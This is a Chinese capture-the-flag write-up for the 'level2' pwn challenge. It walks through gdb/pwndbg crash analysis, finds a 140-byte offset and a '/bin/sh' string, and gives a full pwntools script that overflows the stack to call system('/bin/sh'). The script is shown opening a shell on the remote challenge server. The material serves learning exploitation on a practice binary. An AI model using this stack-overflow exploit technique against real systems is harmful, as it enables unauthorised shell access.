从零开始做题:逆向 ret2text level2

发布时间:2024年01月20日

1.题目信息

https://adworld.xctf.org.cn/challenges/list

2.解题分析?

2.1 ida发现使用了system函数进行输出

?

2.2 gdb无法进行调试

root@pwn_test1604:/ctf/work/4# gdb ./level2 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./level2...(no debugging symbols found)...done.
pwndbg> r
Starting program: /ctf/work/4/level2 
[New process 336]
process 336 is executing new program: /bin/dash
Input:
[Inferior 2 (process 336) exited normally]
pwndbg> 

?2.3 解决gdb无法调试

pwndbg> set follow-fork-mode parent
?

root@pwn_test1604:/ctf/work/4# gdb ./level2 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./level2...(no debugging symbols found)...done.
pwndbg> set follow-fork-mode parent
pwndbg> r
Starting program: /ctf/work/4/level2 
Input:

pwndbg> cyclic 400
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad


2.4 得到EIP的值

pwndbg> r
Starting program: /ctf/work/4/level2 
Input:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad

Program received signal SIGSEGV, Segmentation fault.
0x6261616b in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────[ REGISTERS ]───────────────────────────────────────
 EAX  0x100
 EBX  0x0
 ECX  0xffffd680 ?— 0x61616161 ('aaaa')
 EDX  0x100
 EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ?— 0x1b1db0
 ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ?— 0x1b1db0
 EBP  0x6261616a ('jaab')
 ESP  0xffffd710 ?— 'laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
 EIP  0x6261616b ('kaab')
────────────────────────────────────────[ DISASM ]─────────────────────────────────────────
Invalid address 0x6261616b










─────────────────────────────────────────[ STACK ]─────────────────────────────────────────
00:0000│ esp  0xffffd710 ?— 'laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
01:0004│      0xffffd714 ?— 'maabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
02:0008│      0xffffd718 ?— 'naaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
03:000c│      0xffffd71c ?— 'oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
04:0010│      0xffffd720 ?— 'paabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
05:0014│      0xffffd724 ?— 'qaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
06:0018│      0xffffd728 ?— 'raabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
07:001c│      0xffffd72c ?— 'saabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
───────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────
 ? f 0 6261616b
   f 1 6261616c
   f 2 6261616d
   f 3 6261616e
   f 4 6261616f
   f 5 62616170
   f 6 62616171
   f 7 62616172
   f 8 62616173
   f 9 62616174
   f 10 62616175
Program received signal SIGSEGV (fault address 0x6261616b)
pwndbg> oaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad
Undefined command: "oaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad".  Try "help".
pwndbg> 

2.5 查看kaab对应的值

pwndbg> cyclic -l kaab
140
pwndbg>?
?

2.6 查看strings内容

方法1.通过IDA查看

?

?方法2.通过linux strings、ROPgadget 查看

root@pwn_test1604:/ctf/work/4# strings ./level2
root@pwn_test1604:/ctf/work/4# ROPgadget --binary ./level2 --string "/bin/sh"
?

root@pwn_test1604:/ctf/work/4# strings ./level2
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
read
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh 
t$,U
[^_]
echo Input:
echo 'Hello World!'
;*2$"
/bin/sh
GCC: (Ubuntu 5.2.1-22ubuntu2) 5.2.1 20151010
GCC: (Ubuntu 4.9.2-10ubuntu11) 4.9.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.7181
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
level2.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
read@@GLIBC_2.0
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
_edata
_fini
vulnerable_function
__data_start
system@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
hint
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init
root@pwn_test1604:/ctf/work/4# ROPgadget --binary ./level2 --string "/bin/sh"
Strings information
============================================================
0x0804a024 : /bin/sh
root@pwn_test1604:/ctf/work/4# 

3.解题脚本

3.1只用修改的内容

BIN ? ='./level2'
HOST ?='pwn2.jarvisoj.com'
PORT ?=9878
?

def exploit(p):

?? ?p.recv()
?? ?pl = 140*'a'+p32(elf.plt['system'])
?? ?pl += 'aaaa'
?? ?pl += p32(0x0804a024)
?? ?p.sendline(pl)
?? ?p.interactive()
?? ?return

3.2全部脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pickle import TRUE
from pwn import *
import sys

context.terminal=["tmux","sp","-h"]
context.log_level='debug'

DEBUG = 1

LOCAL = True
BIN   ='./level2'
HOST  ='pwn2.jarvisoj.com'
PORT  =9878




def get_base_address(proc):
	return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)

def debug(bps,_s):
    script = "handle SIGALRM ignore\n"
    PIE = get_base_address(p)
    script += "set $_base = 0x{:x}\n".format(PIE)
    for bp in bps:
        script += "b *0x%x\n"%(PIE+bp)
    script += _s
    gdb.attach(p,gdbscript=script)

# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter

def exploit(p):

	p.recv()
	pl = 140*'a'+p32(elf.plt['system'])
	pl += 'aaaa'
	pl += p32(0x0804a024)
	p.sendline(pl)
	p.interactive()
	return

if __name__ == "__main__":
	elf = ELF(BIN)
	if len(sys.argv) > 1:
		LOCAL = False
		p = remote(HOST, PORT)
		exploit(p)
	else:
		LOCAL = True
		p = process(BIN)
		log.info('PID: '+ str(proc.pidof(p)[0]))
		# pause
		if DEBUG:
			debug([],"")
		exploit(p)

3.3 运行本地level2

需要先运行tmux命令

root@pwn_test1604:/ctf/work/4# python level2.py                                                          │ EIP  0xf7f16589 (__kernel_vsyscall+9) ?— pop    ebp
[DEBUG] PLT 0x8048310 read                                                                               │───────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────
[DEBUG] PLT 0x8048310 read                                                                               │ ? 0xf7f16589 <__kernel_vsyscall+9>     pop    ebp
[DEBUG] PLT 0x8048320 system                                                                             │   0xf7f1658a <__kernel_vsyscall+10>    pop    edx
[DEBUG] PLT 0x8048330 __gmon_start__                                                                     │   0xf7f1658b <__kernel_vsyscall+11>    pop    ecx
[DEBUG] PLT 0x8048340 __libc_start_main                                                                  │   0xf7f1658c <__kernel_vsyscall+12>    ret    
[*] '/ctf/work/4/level2'                                                                                 │    ↓
    Arch:     i386-32-little                                                                             │   0xf7e27b23 <__read_nocancel+25>      pop    ebx
    RELRO:    Partial RELRO                                                                              │   0xf7e27b24 <__read_nocancel+26>      cmp    eax, 0xfffff001
    Stack:    No canary found                                                                            │   0xf7e27b29 <__read_nocancel+31>      jae    __syscall_error <0xf7d6a730>
    NX:       NX enabled                                                                                 │    ↓
    PIE:      No PIE (0x8048000)                                                                         │   0xf7d6a730 <__syscall_error>         call   __x86.get_pc_thunk.dx <0xf7e71b5d>
[+] Starting local process './level2': pid 476                                                           │ 
[*] PID: 476                                                                                             │   0xf7d6a735 <__syscall_error+5>       add    edx, 0x1998cb
[DEBUG] Wrote gdb script to '/tmp/pwnKbKDIl.gdb'                                                         │   0xf7d6a73b <__syscall_error+11>      mov    ecx, dword ptr gs:[0]
    file ./level2                                                                                        │   0xf7d6a742 <__syscall_error+18>      neg    eax
    handle SIGALRM ignore                                                                                

?

3.4 运行远程

root@pwn_test1604:/ctf/work/4# python level2.py 1
[DEBUG] PLT 0x8048310 read
[DEBUG] PLT 0x8048320 system
[DEBUG] PLT 0x8048330 __gmon_start__
[DEBUG] PLT 0x8048340 __libc_start_main
[*] '/ctf/work/4/level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[-] Opening connection to pwn2.jarvisoj.com on port 9878: Failed
Traceback (most recent call last):
  File "level2.py", line 50, in <module>
    p = remote(HOST, PORT)
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/remote.py", line 72, in __init__
    self.sock   = self._connect(fam, typ)
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/remote.py", line 89, in _connect
    for res in socket.getaddrinfo(self.rhost, self.rport, fam, typ, 0, socket.AI_PASSIVE):
socket.gaierror: [Errno -3] Temporary failure in name resolution
root@pwn_test1604:/ctf/work/4# python level2.py 1
[DEBUG] PLT 0x8048310 read
[DEBUG] PLT 0x8048320 system
[DEBUG] PLT 0x8048330 __gmon_start__
[DEBUG] PLT 0x8048340 __libc_start_main
[*] '/ctf/work/4/level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to pwn2.jarvisoj.com on port 9878: Done
[DEBUG] Received 0x7 bytes:
    'Input:\n'
[DEBUG] Sent 0x99 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000080  61 61 61 61  61 61 61 61  61 61 61 61  20 83 04 08  │aaaa│aaaa│aaaa│ ···│
    00000090  61 61 61 61  24 a0 04 08  0a                        │aaaa│$···│·│
    00000099
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0xc bytes:
    'flag\n'
    'level2\n'
flag
level2

?

文章来源:https://blog.csdn.net/weixin_44626085/article/details/135715875
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。